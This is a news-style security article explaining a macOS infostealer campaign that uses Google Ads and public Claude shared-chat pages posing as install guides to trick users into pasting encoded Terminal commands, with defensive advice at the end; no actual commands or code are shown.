Hackers spread macOS malware via ads

Mac malware is getting distributed in a very 2026 way. Not through a sketchy torrent site or a fake Flash update, but through Google Ads and public Claude chat pages that look normal at a glance. The trick is simple — get someone searching for a real tool, land them on a page that feels official, and convince them to paste one command into Terminal. Once that happens, the usual Mac safety rails matter a lot less. ### What’s the scam here? The current wave targets people looking for Anthropic tools on macOS, especially things like Claude desktop or Claude Code setup instructions. Sponsored search results can appear to point at Claude, but the click leads to a malicious page or a public Claude shared chat that pretends to be an installation guide. One example was framed as “Claude Code on Mac” and even attributed to “Apple Support,” which is exactly the kind of fake authority badge that gets people to stop thinking for ten seconds. (bleepingcomputer.com) ### Why use a Claude shared chat? Because it borrows trust. A shared Claude page sits on a legitimate domain and looks like normal AI-generated help content, not a malware drop site. BleepingComputer found two separate public chats using the same social-engineering pattern but different infrastructure underneath, which suggests this is a repeatable delivery method, not a one-off prank. (bleepingcomputer.com) ### What does the victim actually do? They paste a command into Terminal. That’s the whole hinge of the attack. The command is usually encoded, often with Base64, so it looks opaque and technical enough that many people won’t inspect it. But turns out that command reaches out to attacker-controlled domains, pulls down a shell script, and runs the next stage. Microsoft says this tradecraft is spreading because scripts launched this way don’t go through the same Gatekeeper checks users would hit when opening a normal app bundle in Finder. (bleepingcomputer.com) ### What gets stolen? Potentially a lot. Microsoft says recent macOS ClickFix-style campaigns are stealing media files, iCloud data, Keychain entries, and cryptocurrency wallet keys. Some variants also swap real wallet apps for trojanized ones. Earlier reporting tied fake Claude install pages to Amatera Stealer, aimed at credentials and crypto wallets, while Microsoft’s broader May 6 write-up names Macsync, Shub Stealer, and AMOS in related campaigns. Basically, the delivery pages vary, but the end goal is the same — drain anything valuable from the Mac. (bleepingcomputer.com) ### Why is this harder to catch? Because the attacker is leaning on trusted surfaces instead of obviously malicious files. Google’s own ad policies ban malicious software, ad-network abuse, and misrepresentation, but bad ads still slip through review long enough to catch victims. On the payload side, BleepingComputer saw polymorphic delivery — a freshly obfuscated script on each request — which makes hash-based detection weaker. That’s like a thief changing jackets every time they walk past the camera. (microsoft.com) Same person, different snapshot. ### Why are Mac users especially exposed here? Partly because the pitch matches real Mac behavior. Developers and power users already copy install commands from docs all the time, and plenty of regular users now do the same when AI tools tell them to. Push Security’s point in the earlier Claude Code campaign was blunt — the trust model often collapses to “does this page look like the right domain?” That’s a bad fit for ads, cloned docs, and shared AI pages. (support.google.com) ### So what should people actually do? Don’t install Mac software from a sponsored result if you can avoid it. Navigate to the vendor site yourself. Don’t paste opaque Terminal commands from a shared chat, a blog post, or an “AI helper” page unless you can read what the command does. And if an installer flow suddenly asks for Terminal when you expected a drag-and-drop app, treat that as a fire alarm, not a minor inconvenience. (bleepingcomputer.com) ### Bottom line The real change here is not that infostealers exist. It’s that the lure now lives inside places people already trust — ads, docs, and AI-generated help pages. That makes this less like classic malware spam and more like interface hijacking for everyday browsing. (bleepingcomputer.com)